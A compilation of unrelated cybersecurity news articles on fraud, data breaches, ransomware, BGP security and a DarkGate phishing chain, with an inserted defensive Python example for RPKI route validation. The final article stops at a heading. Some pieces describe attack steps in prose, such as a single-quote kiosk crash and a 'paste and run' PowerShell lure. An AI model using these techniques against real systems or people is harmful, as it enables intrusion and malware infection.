Twenty-two Chinese nationals have pleaded guilty to cyber-related crimes in Zambia. They are among the 77 suspects arrested earlier this April in connection with what the authorities described as a highly organized and advanced internet fraud syndicate. The raid took place at a Chinese-run company in Lusaka, the capital city of Zambia. The operation was prompted by the rising trend of internet crimes, which have caused financial losses to individuals both locally and worldwide. According to reports, the Chinese nationals are expected to be sentenced on Friday.

Zambia Cyber Fraud Case: What Led to the Crackdown

In recent years, the Drug Enforcement Commission (DEC) of Zambia has noted a drastic increase in cases where Zambians lost funds from their mobile and bank accounts through money laundering schemes that extend beyond the country's borders. Victims have been identified in countries such as Singapore, Peru, the United Arab Emirates (UAE), and across Africa.

Several young Zambians were also taken into custody in the same operation, the BBC reported. These individuals were allegedly recruited to work as call center agents in order to defraud others through online scams. According to the DEC, the recruits would engage unsuspecting mobile users in scripted conversations on platforms like WhatsApp, Telegram, and various chat rooms.

The trial took several weeks but concluded with the 22 Chinese nationals, one of them a woman, pleading guilty to three counts: computer fraud by false representation; possession of articles for use in fraud; and operating an electronic communications network or service without a license. A Cameroonian national was also charged with having changed people's social media profile pictures to scam them.

The suspects were linked to Golden Top Support Services, a Chinese-owned company that was at the center of the raid. The alleged offenders, according to reports, are yet to respond to the allegations. Li Xianlin, thought to be the director of Golden Top Support Services Limited, has been accused of breaking Zambian law by operating his company without acquiring the relevant licenses.

On Tuesday, the state prosecutor asked for a more detailed statement than had been provided on each count. The Zambian nationals involved in the conspiracy were arrested in April and then granted bail with conditions until investigations were completed.

Among the items seized were devices that enabled callers to conceal their location, alongside numerous SIM cards. These included 11 SIM boxes, tools capable of routing calls through real phone networks. The huge number of SIM cards confiscated, over 13,000, both domestic and foreign, indicates how far and wide the operation was spread. In addition, two firearms, about seventy-eight rounds of ammunition, and two vehicles linked to the Chinese man connected to the business were also seized.

Cybercrime in Africa: A Significant Menace

The Zambian cyber fraud case illustrates how widespread internet scams have become and how they now have a global reach. Cybercrime in Africa is a significant menace: losses were estimated at $3.5 billion annually in 2020, and the number has continued to increase, with recent data showing that Africa saw the highest average number of weekly cyberattacks per organization in the second quarter of 2023, a 23% increase compared to the same period in 2022. The financial losses from these attacks are significant. According to ECA data, Africa's low level of preparedness for cyber threats resulted in an average cost of 10% of GDP for countries in 2022. Countries such as Nigeria, Kenya, and South Africa have been hit hard, with a large proportion of cases involving online fraud, identity theft, and financial fraud.

According to a CGTN report, weak telecommunication infrastructure in many African countries has made it easier for cybercrime to thrive, leading to a noticeable drop in productivity across several sectors. The report highlighted that over 90 percent of African businesses were functioning without the essential cybersecurity protections they need.

Similarly, in Zambia, cybercrimes have surged, with the DEC reporting many cases of people and businesses falling prey to various schemes. This has been aggravated by increased connectivity and use of mobile and internet services, making users more vulnerable to cyber-attacks.
While Microsoft's forthcoming Recall feature has already sparked security and privacy concerns, the tech giant attempted to downplay those reactions by stating that collected data would remain on the user's device. Despite this reassurance, concerns remain, as researchers, including the developer of a new tool dubbed "TotalRecall", have observed various inherent vulnerabilities in the local database maintained by Recall, lending credibility to critics of Microsoft's implementation of the AI tool.

TotalRecall Tool Demonstrates Recall's Inherent Vulnerabilities

Recall is a new Windows AI tool planned for Copilot+ PCs that captures screenshots from user devices every five seconds and stores the data in a local database. The tool's announcement, however, led many to fear that this process would make sensitive information on devices susceptible to unauthorized access.

TotalRecall, a new tool developed by Alex Hagenah and named after the 1990 sci-fi film, highlights the potential compromise of this stored information. Hagenah states that the local database is unencrypted and stores data in plain text format. The researcher likened Recall to spyware, calling it a "Trojan 2.0." TotalRecall was designed to extract and display all the information stored in the Recall database, pulling out screenshots, text data, and other sensitive information, highlighting the potential for abuse by criminal hackers or domestic abusers who may gain physical access to a device.

Hagenah's concerns are echoed by others in the cybersecurity community, who have also compared Recall to spyware or stalkerware. Recall captures screenshots of everything displayed on a user's desktop, including messages from encrypted apps like Signal and WhatsApp, websites visited, and all text shown on the PC. TotalRecall can locate and copy the Recall database, parse its data, and generate summaries of the captured information, with features for date range filtering and term searches. Hagenah stated that by releasing the tool on GitHub, he aims to push Microsoft to fully address these security issues before Recall's launch on June 18.

Microsoft Recall Privacy and Security Concerns

Cybersecurity researcher Kevin Beaumont has also developed a website for searching Recall databases, though he has withheld its release to give Microsoft time to make changes. Microsoft's privacy documentation for Recall mentions the ability to disable screenshot saving, pause Recall on the system, filter out applications, and delete data. Nonetheless, the company acknowledges that Recall does not moderate the captured content, which could include sensitive information like passwords, financial details and more. The risks extend beyond individual users, as employees under "bring your own device" policies could leave with significant amounts of company data saved on their laptops.

The UK's data protection regulator has requested more information from Microsoft regarding Recall and its privacy implications. Amid criticism over recent hacks affecting US government data, Microsoft CEO Satya Nadella has emphasized the company's need to prioritize security. However, the issues surrounding Recall demonstrate that security concerns were not given sufficient attention, and necessitate inspection of its data collection practices before its official release.

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
New York-based cyber risk ratings vendor SecurityScorecard has filed a lawsuit against its cyber risk management rival Safe Security for alleged unfair competition and misappropriation of trade secrets. SecurityScorecard has accused its former employee, Mary Polyakova, of being a key perpetrator of the embezzlement. According to the lawsuit, Polyakova retrieved SecurityScorecard's confidential information, such as its lists of customers and prospects, before quitting the company last month and later joining Safe Security in Silicon Valley as its sales vice president.

The breach of confidential information was apparently valued at $40 million by SecurityScorecard and includes details of 9,300 customers and prospects. In a 30-page complaint filed on Tuesday in the Southern District of New York, SecurityScorecard said, "While brazenly touting a 'revolutionary' approach to cybersecurity risk management, defendant Safe's only true 'revolution' is its unconstrained reliance upon unlawful skullduggery and unfair competition to build its business."

Meanwhile, Safe Security CEO Saket Modi, refuting the allegations, said that his company's competitors like SecurityScorecard were laying off many of their employees because of poor business and were thus resorting to legal retribution.

SecurityScorecard Shares Embezzlement Details

According to SecurityScorecard, Polyakova allegedly misappropriated an exhaustive list of the company's customers and prospects, which included the Master East List and CISO Prospect Lists, and later shared the information to her personal email. It claimed that if this customer information were misused by Safe Security, it could damage the business prospects of SecurityScorecard.

(Image: Source: LinkedIn)

The company feared that Safe Security could unlawfully poach its customers, which could harm the business interests of SecurityScorecard. Before joining Safe Security, Polyakova had spent four years in SecurityScorecard's sales organization. "SSC's customer and prospect list is the direct result of years of marketing and sales efforts and cannot be replicated through publicly available sources," the company said. "SSC therefore undertakes considerable efforts to maintain the secrecy of its confidential information, including the Master East List and the CISO Prospect Lists."

The company alleged that, apart from stealing the data and poaching customers, Safe Security used fake accounts to illegally access SecurityScorecard's customer platform and tried to enhance its own cybersecurity offerings. SecurityScorecard alleged that Safe Security misused this access to quality-check its products and make misleading comparisons on the company's website. "Safe has used a shell company or an entirely fake domain to impermissibly access the SSC [SecurityScorecard] platform to perform competitive intelligence gathering," the company said. "This appears to have included trying: (i) to see the SSC products and services purchased by SSC customers; and (ii) validating SAFE's own offerings to customers."

SecurityScorecard Wants End to Unlawful Practices

According to SecurityScorecard, Safe Security, through its actions, would be violating the former's end-user SaaS agreement, including by registering IP addresses under fake domains. Safe Security had allegedly launched a webpage to compare its services with SecurityScorecard, the lawsuit alleged.

"On April 9, 2024, Safe's Co-Founder and Chief Executive Officer, Saket Modi, bragged to SSC's President, Sachin Bansal, that Safe was interviewing former SSC employees with no real intention of hiring them for open positions," the company said. "As proof of these illicit fact-finding endeavors, Mr. Modi touted to Mr. Bansal confidential statistics on SSC's hiring and restructuring practices," it added. SecurityScorecard claimed that Safe Security had conducted fake job interviews with its employees to elicit confidential business information.

The company sought monetary damages as well as a stay order to stop Safe Security and Polyakova from using or disclosing the allegedly stolen information. "Even when caught in this web of deceptive wrongdoing, Safe has simply adopted a 'deny, deny, deny' posture, effectively doubling down on their unlawful conduct," SecurityScorecard said, and added, "That's precisely what necessitates the injunctive relief now sought here, to put an immediate end to these unlawful practices and protect SSC's trade secrets and confidential and proprietary information." SecurityScorecard said it had pumped in over $200 million to develop its customer and prospect base and had measures in place to protect its proprietary information.
Senator Ron Wyden (D-Ore.) is pressing the U.S. government to accelerate cybersecurity enhancements within the healthcare sector following the devastating Change Healthcare ransomware attack that exposed the protected health information of nearly a third of Americans. In a letter to Xavier Becerra, secretary of the U.S. Department of Health and Human Services, Wyden urged HHS to implement immediate, enforceable steps to improve the "lax cybersecurity practices" of large healthcare organizations.

"It is clear that HHS' current approach to healthcare cybersecurity — self-regulation and voluntary best practices — is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers." - Wyden

He stated that the sub-par cybersecurity standards have allowed hackers to steal patient information and disrupt healthcare services, which has caused "actual harm to patient health."

MFA Could Have Stopped Change Healthcare Attack

The call from Wyden comes on the back of the ransomware attack on Change Healthcare, a subsidiary of UnitedHealth Group, which, according to its Chief Executive Officer Andrew Witty, could have been prevented with the basic cybersecurity measure of Multi-Factor Authentication (MFA). The lack of MFA on a Citrix remote access portal account that Change Healthcare used proved to be a key vulnerability that allowed attackers to gain initial access using compromised credentials, Witty told the Senate Committee on Finance in a May 1 hearing.

"HHS' failure to regulate the cybersecurity practices of major health care providers like UHG resulted in what the American Hospital Association has described as the worst cyberattack against the healthcare sector in U.S. history." - Wyden

The use of MFA is a fundamental cybersecurity practice that HHS should mandate for all healthcare organizations, Wyden argued. He called for the implementation of broader minimum and mandatory technical cybersecurity standards, particularly for critical infrastructure entities designated as "systemically important entities" (SIE) by the U.S. Cybersecurity and Infrastructure Security Agency.

"These technical standards should address how organizations protect electronic information and ensure the healthcare system's resiliency by maintaining critical functions, including access to medical records and the provision of medical care," Wyden noted. He suggested that HHS enforce these standards by requiring Medicare program participants to comply.

Wyden's Proposed Cybersecurity Measures for HHS

Wyden said HHS should mandate a range of cybersecurity measures as a result of the attack. "HHS must follow the lead of other federal regulators in mandating cybersecurity best practices necessary to protect the healthcare sector from further, devastating, easily-preventable cyberattacks," Wyden argued. The Democratic senator proposed several measures to enhance cybersecurity in the healthcare sector, including:

Mandatory Minimum Standards: Establish mandatory cybersecurity standards, including MFA, for critical healthcare infrastructure.
Rapid Recovery Capabilities: Ensure that organizations can rebuild their IT infrastructure within 48 to 72 hours following an attack.
Regular Audits: Conduct regular audits of healthcare organizations to assess and improve their cybersecurity practices.
Technical Assistance: Provide technical security support to healthcare providers.

Wyden criticized HHS for its current insufficient regulatory oversight, which he believes contributes to the ongoing cyberattacks harming patients and national security. "The current epidemic of successful cyberattacks against the health care sector is a direct result of HHS's failure to appropriately regulate and oversee this industry, harming patients, providers, and our national security," Wyden said. He urged HHS to use all of its authorities to protect U.S. healthcare providers and patients from mounting cybersecurity risks.

The State of Ransomware in Healthcare

The healthcare sector was the most common ransomware target among all critical infrastructure sectors, according to the FBI's Internet Crime Report 2023. The number of attacks and individuals impacted has grown exponentially over the last three years.

(Image: Ransomware attacks on healthcare in the last three years. Source: Emsisoft)

"In 2023, 46 hospital systems with a total of 141 hospitals were impacted by ransomware, and at least 32 of the 46 had information, including protected health information, stolen." - Emsisoft

A study by McGlave, Neprash, and Nikpay of the University of Minnesota School of Public Health found that in a five-year period starting in 2016, ransomware attacks likely killed between 42 and 67 Medicare patients. Their study further observed a decrease in hospital volume and services of 17-25% during the week following a ransomware attack, which not only hit revenue but also increased in-hospital mortality among patients who were already admitted at the time of the attack.

HHS Cybersecurity Response

HHS announced in December plans to update its cybersecurity regulations for the healthcare sector for the first time in 21 years. These updates would include voluntary cybersecurity performance goals and efforts to improve accountability and coordination. The Healthcare and Public Health Sector Coordinating Council (HSCC) also unveiled a five-year Health Industry Cybersecurity Strategic Plan in April, which recommends 10 cybersecurity goals to be implemented by 2029.

Wyden acknowledged and credited the latest reform initiatives from HHS and the HSCC, but remains concerned about the lengthy implementation timeline; the healthcare sector, he said, requires urgency. The letter follows Wyden's request last week to the SEC and FTC to investigate any negligence in the cybersecurity practices of UnitedHealth Group. HHS is currently investigating the UHG breach that resulted in the exposure of protected health information of hundreds of thousands of Americans.
A Chinese research team has identified a severe security flaw in the design of RISC-V processors, posing a threat to China's expanding domestic semiconductor and chip sector. The flaw enables cyber attackers to bypass modern processors' security measures without administrative rights, which could lead to the theft of sensitive information and breaches of personal privacy.

RISC-V is an open-source standard used in advanced chips and semiconductors. Unlike mainstream CPU architectures like Intel's and AMD's x86, RISC-V offers free access and can be modified without restriction. This openness has made it a critical component of China's strategy to circumvent US-imposed chip bans and achieve semiconductor independence.

The vulnerability was discovered in RISC-V's SonicBOOM open-source code and confirmed by Professor Hu Wei's team at Northwestern Polytechnical University (NPU), a major defense research institute in Shaanxi. On April 24, the research team, which specializes in hardware design security, vulnerability detection, and cryptographic application safety, reported the issue to China's National Computer Network Emergency Response Technical Team/Coordination Centre (CNCERT). NPU revealed additional details in an official statement on May 24.

US-Imposed Chip Bans: What Are They?

Since 2022, US officials have set broad restrictions on which computing processors can be supplied to China, reducing shipments by Nvidia (NVDA.O), Advanced Micro Devices (AMD.O), and Intel (INTC.O), among others. These restrictions mirrored previous limits on semiconductor shipments to Huawei Technologies (HWT.UL). However, U.S. officials have granted licenses to at least two US companies, Intel and Qualcomm (QCOM.O), to continue shipping chips to Huawei, which is using an Intel chip to power a new laptop model.

Why Is This Vulnerability a Problem for China?

The vulnerability's discovery is particularly troubling for China, which has been relying heavily on RISC-V to develop its CPUs. By the end of 2022, over 50 different versions of locally produced RISC-V chips were being mass-produced in China, primarily for embedded applications such as industrial controls, power management, wireless connectivity, storage control, and the Internet of Things. Recent developments have seen RISC-V expanding into more demanding applications, including industrial control, autonomous driving, artificial intelligence, telecommunications, and data centers. RISC-V processors have gained popularity due to their simplicity, modularity, scalability, and the rapid evolution of the architecture since its inception.

Origins of RISC-V

RISC-V was developed in 2010 by Professor David Patterson at the University of California, Berkeley, who also designed RISC-I in 1980. Despite its advantages, the newly discovered flaw in RISC-V could undermine its reliability and security, potentially impacting its adoption and use in critical applications.

The discovery is part of China's national key research and development program in processor hardware security, initiated in 2021. The program, carried out by CNCERT, Tsinghua University, NPU, and the Institute of Microelectronics of the Chinese Academy of Sciences, focuses on the research and detection of hardware vulnerabilities. The CNCERT report emphasized that processor-related vulnerability mining is highly challenging, with the number of RISC-V processor vulnerabilities in global libraries being significantly lower than the number of software and firmware vulnerabilities.

NPU's Role

NPU's participation in discovering this weakness demonstrates its status as a pioneer in China's information security education and research, which aligns with the country's strategic needs. NPU developed its "information confrontation" undergraduate program in 2000, which was renamed "information security" in 2009. In 2011, it established the National Institute of Confidentiality, which added "secrecy" to the curriculum. In 2018, the university expanded its cybersecurity focus by founding the School of Cybersecurity.

The vulnerability's influence extends beyond China, affecting global technology corporations and the semiconductor industry. As China pursues semiconductor independence, addressing and mitigating such vulnerabilities will be critical to guaranteeing the security and dependability of its domestic chip industry.
A hack on Malaysia's Railway Assets Corporation (RAC), a key entity under Malaysia's Ministry of Transport, has been reported by a dark web actor. The threat actor "billy100" claimed responsibility for the breach and posted the allegations on the BreachForums platform. The RAC data breach, as described on the forum, concerns personnel records allegedly leaked from the Railway Assets Corporation (RAC). According to billy100, the compromised database contains 481 lines of records. As evidence, the threat actor provided samples from the CSV files "users_id" and "detail," which included hashed passwords, email addresses, and usernames.

RAC Data Breach Allegedly Exposes Sensitive Information

(Image: Source: Dark Web)

Established under the Railways Act of 1991, the Railway Assets Corporation (RAC) is a federal statutory entity tasked with supporting Malaysia's railway infrastructure. Since its founding in 1992, RAC has played a significant role in bringing the nation's railway industry up to par with other leading nations. Its responsibility for managing and growing railway assets makes it a critical organization.

The database exposed in the alleged RAC data breach purportedly contains sensitive employee data covering several aspects of personnel records. The stolen data consists of two main files: users_id.csv, which contains vital user information such as IDs, names, emails, passwords, and more; and detail.csv, which offers additional in-depth employee information such as personal identifiers, department information, salary, and dates of birth.

Investigation and Cyberattacks on the Railway Sector

The Cyber Express has made inquiries to the organization about the RAC data loss and potential ransomware gang involvement. However, as of the time of this writing, no formal response or statement had been made, so the allegations regarding the RAC data leak remain unsubstantiated.

Railroads, being essential infrastructure in the digital age, are increasingly vulnerable to cyber threats that endanger both their daily operations and public safety. Recent attacks on international railway networks have brought attention to the need for stronger cybersecurity protections. Vulnerabilities brought on by outdated systems, unsecured networking, and IoT devices raise the risks. Rail operators need to prioritize asset visibility, implement strong authentication, encrypt communication networks, and keep up to date with patches and upgrades to strengthen security. Ensuring that staff members receive comprehensive cybersecurity training is also essential. If transportation is to remain reliable and secure in the future, cybersecurity must be fully integrated into railway operations.
The FBI has retrieved almost 7,000 decryption keys related to the LockBit operation, which affected thousands of businesses. After the sequence of events that resulted in the arrest of the ransomware group, the FBI is now asking LockBit victims to come forward so they can recover their encrypted data without worrying about facing financial or legal repercussions.

At the Boston Conference on Cyber Security in 2024, Assistant Director of the FBI's Cyber Division Bryan Vorndran spoke about the LockBit operation and the strategies taken by national security agencies to oppose it. Vorndran outlined the FBI's complex plan for thwarting LockBit ransomware attacks and emphasized the importance of taking preventative measures against this ransomware gang. "Disrupting LockBit and its affiliates became a global effort, involving FBI work with agencies from 10 other countries, particularly the British National Crime Agency, over more than three years," said Vorndran, indicating the FBI's steadfast dedication to enforcing the law online.

FBI Urges LockBit Victims to Reclaim Their Encrypted Data

The recent action taken by the FBI against the well-known ransomware-as-a-service operation LockBit was a critical turning point in the disruption of criminal networks. Vorndran provided insight into the workings of LockBit, blaming its growth on the business ventures of its creator, Dimitri Khoroshev.

"Additionally, from our ongoing disruption of LockBit, we now have over 7,000 decryption keys and can help victims reclaim their data and get back online. We are reaching out to known LockBit victims and encouraging anyone who suspects they were a victim to visit our Internet Crime Complaint Center at ic3.gov," said Vorndran.

Citing previous legal actions against Khoroshev and his co-conspirators for fraud, extortion, and similar offenses, Vorndran reaffirmed the FBI's commitment to holding perpetrators accountable in an unflinching stance against cyber adversaries. He reaffirmed the FBI's commitment to seeking justice and offering assistance to victims through programs like the recovery of LockBit decryption keys.

Vorndran underlined the significance of thorough cybersecurity procedures and cooperative partnerships in protecting against malicious activity given the ongoing evolution of cyber threats. He urged all parties involved to band together in the battle against cybercrime, stressing that it is a shared duty to strengthen digital defenses and provide a safe online environment for everybody. Vorndran reaffirmed the FBI's steadfast dedication to thwarting cyber threats and promoting cross-sector cooperation, and called on people to support the idea of collective resilience, reiterating that working together is essential to overcoming the ever-changing threats posed by cybercriminals.

Ransomware-as-a-Service Models on the Rise

Recognizing the critical role that partnerships play, Vorndran emphasized the importance of public-private partnerships working together both nationally and internationally to effectively tackle cyber threats. He underlined the value of victim engagement, pointing out that the FBI's operational strategy relies heavily on prompt threat response and comprehensive victim care.

Vorndran's remarks on cybercrime included a discussion of the emergence of ransomware-as-a-service models. Under these models, affiliates receive sophisticated malware in exchange for payment from criminal syndicates that resemble elements of conventional organized crime. He alerted businesses to the growing threat posed by ransomware attacks, which often combine two or three different extortion techniques, leaving victims exposed to both data theft and financial extortion. Vorndran emphasized the need to take preventative action, advising companies to strengthen their cybersecurity defenses and allocate resources in a way that allows for reasonable downtime. Citing cybercriminals' careful assessment of possible victims based on susceptibility, brand reputation, and economic impact, he underlined the significance of target identification.
Researchers observed a Kiosk mode bypass vulnerability in a remote hotel's check-in terminal during their stay there while traveling to attend a threat modeling workshop. The hotel's terminal operates through the use of the Ariane Allegro Scenario Player. Ariane is an international provider of self-check show more ...
systems for the hospitality industry, with deployment to more than 3,000 sites across 25 different countries. The researchers discovered the flaw in the check-in system's guest search feature, leading to a crash that allowed for unauthorized access to the underlying system. Kiosk Mode Bypass Grants Access To Hotel's Windows Desktop The hotel, which had no check-in staff, relied solely on the self-service check-in terminal running the Ariane Allegro Scenario Player in kiosk mode. Visiting researchers from Pentagrid discovered that the check-in terminal crashed when a single quote character was inserted into its guest search feature. Upon trying to interact with the terminal screen after the crash, the Windows operating system asks the user if it should wait longer or stop the running task. Selecting the second option halts the kiosk mode application entirely, unexpectedly allowing the team to access the underlying Windows Desktop. The researchers attributed the flaw as an accidental discovery by Martin "O'YOLO" Schobert. The researchers state that this bypass poses significant risks as attackers with access to the Windows desktop could potentially target a hotel's entire network, access stored data (including PII, reservations, and invoices), or create room keys for other hotel rooms by exploiting its RFID room-provisioning functionality. The kiosk mode bypass vulnerability has been rated with a CVSS score of 6.8 (medium). The researchers specified the following preconditions as necessary for successful exploitation of the vulnerability: Physical access to the check-in terminal along with time, depending upon the attack's preparation. The check-in terminal must be in a self-service state, as hotels might enable this option only during specific times or during staff shortage. According to Ariane Systems, the issue stemmed from the use of outdated versions of its check-in software at the new hotel. 
Disclosure Process and Vendor Response

The vulnerability's discovery led the team to investigate further, finding that a hotel chain from Liechtenstein and Switzerland uses the check-in terminal for its smaller hotel locations. The vulnerability could potentially affect several hotels that rely on Ariane's Allegro Scenario Player check-in system. The researchers first discovered the vulnerability on March 5, 2024, and immediately attempted to disclose it to the vendor through multiple channels, such as LinkedIn, contact numbers and official email addresses. They also attempted to reach the company's technical leader and chief product officer, and received a delayed response on March 18 in which Ariane Systems claimed that the reported systems were legacy software models and that no personally identifiable information (PII) or exploitable data could be retrieved from the kiosk machine. The researchers dispute this claim, stating that the kiosk was designed to produce and keep accessible invoice files. In a later call with Ariane Systems on April 11, further vulnerability details were shared, and the researchers awaited a response. They state that as of June 5, 2024, there have been no updates from the vendor. They cite the initial delays and the lack of further updates as reasons for publicly disclosing the vulnerability after a waiting period of 90 days.

To mitigate potential risks stemming from the vulnerability, the researchers recommended that hotels using the Ariane Allegro Scenario Player check that they have the most recent version of the software installed, as the issue was reportedly fixed by the vendor. Additionally, they advised hotels to isolate check-in terminals on the network so that a potential bypass cannot be used by attackers to compromise hotel networks or underlying Windows systems.

Media Disclaimer: This report is based on internal and external research obtained through various means.
The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.
The Federal Communications Commission (FCC) today took steps to make internet use safer in the U.S., approving a $200 million program to improve cybersecurity in schools and proposing to require broadband providers to report on their Border Gateway Protocol (BGP) risk mitigation processes.

The three-year Schools and Libraries Cybersecurity Pilot Program will study which cybersecurity services and equipment would best help K-12 schools and libraries address growing cyber threats and attacks against their broadband networks. The pilot program will help the Commission “better understand whether and how universal service funds could be used to support the cybersecurity needs of schools and libraries and to share lessons learned with our federal partners to jointly combat this growing problem.” The program will be kept separate from the FCC’s E-Rate program “to ensure gains in enhanced cybersecurity do not undermine E-Rate’s success in connecting schools and libraries and promoting digital equity.”

(Image: FCC Chair Jessica Rosenworcel)

This pilot program is part of FCC Chair Jessica Rosenworcel’s Learn Without Limits initiative to improve connectivity in schools and libraries “so everyone, everywhere has access to high-speed internet services.” That initiative supports Wi-Fi on school buses, E-Rate support for libraries in Tribal communities, and funding from the E-Rate program for off-premises use of Wi-Fi hotspots and wireless internet access services.

BGP Security Targeted by FCC

The BGP security initiative stops short of mandating security standards for broadband service providers; instead, it would simply require them to report on the effectiveness of their efforts. The measure will be open for public comment before it can be finalized. Broadband providers would be required to “create confidential reports on the steps they have taken, and plan to undertake, to mitigate vulnerabilities in the Border Gateway Protocol (BGP), the technical protocol used to route information across the internet. The nation’s largest broadband providers would also be required to file specific public data on a quarterly basis demonstrating their BGP risk mitigation progress.”

The decades-old protocol, widely used for communication between networks, “does not include intrinsic security features to ensure trust in the information that is relied upon to exchange traffic among independently managed networks on the internet,” the FCC said in a press release. “BGP national security experts have raised concerns that a bad network actor may deliberately falsify BGP reachability information to redirect traffic. These ‘BGP hijacks’ can expose Americans’ personal information; enable theft, extortion, and state-level espionage; and disrupt services upon which the public or critical infrastructure sectors rely.”

The Notice of Proposed Rulemaking adopted today would require that broadband internet access service providers “prepare and update confidential BGP security risk management plans at least annually. These plans would detail their progress and plans for implementing BGP security measures that utilize the Resource Public Key Infrastructure (RPKI), a critical component of BGP security.” The nine largest providers would also have to file publicly available quarterly data assessing progress in the implementation of RPKI-based security measures. These large providers won’t have to file subsequent detailed plans with the FCC if they meet a certain security threshold. Smaller broadband providers would not be required to file their plans with the Commission, but would make them available to the FCC upon request.

BGP Hijacked by China Telecom 6 Times

In a statement, Rosenworcel noted that BGP is also known as the “three-napkin protocol.”

(Image: Vint Cerf, "the father of the internet")

“Back in 1989, the internet, then a novelty for computer scientists like Vint Cerf, was expanding—fast,” she said. “But the internet’s basic protocols at the time could not handle this growth. So on their lunch break from an Internet Engineering Task Force meeting in Austin, Texas, a pair of engineers sketched out the ideas for BGP on three ketchup-stained paper napkins. What was meant to be a short-term solution developed on the sidelines of an internet engineering conference is still with us today.” Rosenworcel thanked the Cybersecurity and Infrastructure Security Agency “for working with my office and jointly holding a BGP public forum to discuss this problem.” She also thanked the Department of Defense and Department of Justice “for publicly disclosing in our record that China Telecom used BGP vulnerabilities to misroute United States internet traffic on at least six occasions.” “These ‘BGP hijacks’ can expose personal information, enable theft, extortion, and state-level espionage,” she said. “They can also disrupt sensitive transactions that require security, like those in the financial sector.”
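To make concrete what the RPKI-based measures in the proposal actually check, here is an added example (not code from the FCC, the article or any vendor) of Route Origin Validation as defined in RFC 6811: each BGP announcement (prefix, origin AS) is compared against a set of ROAs and classified Valid, Invalid or NotFound, which is how an RPKI-aware router recognises a forged origin. It goes beyond the article by implementing the general algorithm; the ROAs and announcements are constructed from documentation prefixes and ASNs and describe no real network.

```python
"""Route Origin Validation (RFC 6811) against a set of ROAs.

Added example, not code from the FCC or the article. ROAs and announcements
below are constructed from RFC 5737/3849 documentation prefixes and RFC 5398
documentation ASNs; they describe no real network.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class ROA:
    """Route Origin Authorization: AS `asn` may originate `prefix` and any
    more-specific of it down to `max_length` bits."""
    prefix: str
    asn: int
    max_length: int


def _covers(roa_prefix, route) -> bool:
    """A ROA prefix covers a route if the route lies inside it (same family)."""
    return roa_prefix.version == route.version and route.subnet_of(roa_prefix)


def validate_origin(prefix: str, origin_asn: int, roas) -> str:
    """Classify an announced (prefix, origin AS) pair as Valid, Invalid or NotFound.

    RFC 6811 logic: with no covering ROA the route is NotFound; with at least
    one covering ROA it is Valid only if some covering ROA names the same
    origin AS and permits the announced prefix length; otherwise Invalid.
    """
    route = ipaddress.ip_network(prefix, strict=False)
    covering = [r for r in roas if _covers(ipaddress.ip_network(r.prefix), route)]
    if not covering:
        return "NotFound"
    for roa in covering:
        if roa.asn == origin_asn and route.prefixlen <= roa.max_length:
            return "Valid"
    return "Invalid"


def flag_hijacks(announcements, roas):
    """Return the announcements an RPKI-aware router would reject as Invalid.

    `announcements` is an iterable of (prefix, origin_asn). An Invalid result is
    what an announcement that forges reachability for a covered prefix looks
    like to ROV, whether it uses the wrong origin AS or a too-specific prefix.
    """
    return [(p, a) for p, a in announcements if validate_origin(p, a, roas) == "Invalid"]


# Constructed ROA set (documentation resources only).
SAMPLE_ROAS = [
    ROA("192.0.2.0/24", 64496, 24),      # AS64496 may announce exactly the /24
    ROA("198.51.100.0/24", 64497, 26),   # AS64497 may announce the /24 down to /26
    ROA("2001:db8::/32", 64498, 48),     # IPv6 documentation prefix, down to /48
]

# Constructed announcements as a route collector might receive them.
SAMPLE_ANNOUNCEMENTS = [
    ("192.0.2.0/24", 64496),        # legitimate origin -> Valid
    ("192.0.2.0/25", 64496),        # right AS but more specific than maxLength -> Invalid
    ("192.0.2.0/24", 64511),        # wrong origin AS -> Invalid (origin forgery)
    ("198.51.100.64/26", 64497),    # more-specific within maxLength -> Valid
    ("203.0.113.0/24", 64499),      # no ROA covers it -> NotFound
    ("2001:db8:1::/48", 64498),     # Valid IPv6 more-specific
    ("2001:db8::/32", 64500),       # wrong origin AS -> Invalid
]


if __name__ == "__main__":
    for prefix, asn in SAMPLE_ANNOUNCEMENTS:
        print(f"{prefix:<20} AS{asn:<6} {validate_origin(prefix, asn, SAMPLE_ROAS)}")
    print("rejected:", flag_hijacks(SAMPLE_ANNOUNCEMENTS, SAMPLE_ROAS))
```

Note that NotFound routes are still accepted by ROV; the protection only covers prefixes whose holders have published ROAs, which is why the proposal tracks RPKI deployment progress.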
Security researchers have uncovered a new phishing campaign that attempts to trick recipients into pasting (CTRL+V) and executing malicious commands on their system. It leverages a sophisticated attack chain along with what the researchers have dubbed the "paste and run" technique.

'Paste and Run' Phishing Technique

The attackers behind the campaign send emails to potential victims purporting to be from legitimate businesses or organizations. Researchers from AhnLab stated that these emails often involve topics such as fee processing or operational instructions to entice recipients into opening attached files. The emails carry a file attachment whose purpose is disguised, as in the examples below.

(Image source: asec.ahnlab.com)

Once the victim opens the HTML attachment, a fake message is displayed in the browser, styled to look like a Microsoft Word document. This message directs the user to click a "How to fix" button that purports to help them load the document offline. After the button is clicked, a set of instructions prompts the user to press a sequence of keyboard shortcuts: first [Win+R], then [Ctrl+V], then [Enter].

(Image source: asec.ahnlab.com)

The button may alternatively load a different set of instructions directing the user to open the Windows PowerShell terminal manually and right-click inside the terminal window. By following the instructions, the victim inadvertently pastes a malicious script into the terminal, which then executes on their system.

Phishing Scheme Installs DarkGate Malware

The PowerShell script downloaded and executed by the scheme is a component of the DarkGate malware family. Once the script runs, it downloads and executes an HTA (HTML Application) file from a remote command-and-control server. The HTA file then executes additional instructions to launch AutoIt3.exe while passing a malicious AutoIt script (script.a3x) as an argument. The script appears to load the DarkGate malware to infect the system, while also clearing the user's clipboard to conceal the execution of malicious commands.

"The overall operation flow from the reception of the email to the infection is quite complex, making it difficult for users to detect and prevent," the researchers noted.

(Image source: asec.ahnlab.com)

Protecting Against the Phishing Campaign

